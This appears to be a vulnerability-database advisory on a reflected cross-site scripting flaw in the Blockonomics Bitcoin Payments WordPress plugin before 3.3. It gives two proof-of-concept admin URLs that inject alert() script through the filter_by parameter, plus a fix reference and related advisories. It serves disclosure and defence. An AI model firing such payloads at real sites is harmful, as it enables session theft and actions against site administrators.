WordPress Bitcoin Payments – Blockonomics < 3.3 – Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The plugin does not properly sanitise its filter action when viewing Orders before outputting it back in an attribute, leading to a reflected Cross-Site Scripting vulnerability.

Proof of Concept

v <= 3.2 - https://example.com/wp-admin/edit.php?post_type=shop_order&filter_by=%22autofocus+onfocus%3Dalert%28%2FXSS%2F%29%2F%2F

v < 3.2 - https://example.com/wp-admin/edit.php?post_type=shop_order&filter_by="><script>alert(/XSS/)</script>

Affects Plugins

blockonomics-bitcoin-payments

Fixed in 3.3

References

URL

https://plugins.trac.wordpress.org/changeset/2556230/blockonomics-bitcoin-payments

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

aee57190-6099-41de-a36e-89928246cc29

Timeline

Publicly Published

2021-06-01 (about 4 years ago)

Added

2021-07-01 (about 4 years ago)

Last Updated

2021-07-01 (about 4 years ago)

Other

Published

Title

Published

2024-12-05

Title

Splash Sync < 2.0.8 - Reflected Cross-Site Scripting

Published

2024-04-09

Title

Bold Page Builder < 4.8.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via AI Features

Published

2024-08-07

Title

ComboBlocks < 2.2.87 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-08-18

Title

Plugins List < 2.5.1 - Admin+ Stored XSS

Published

2022-06-16

Title

WooCommerce - Product Importer <= 1.5.2 - Reflected Cross-Site Scripting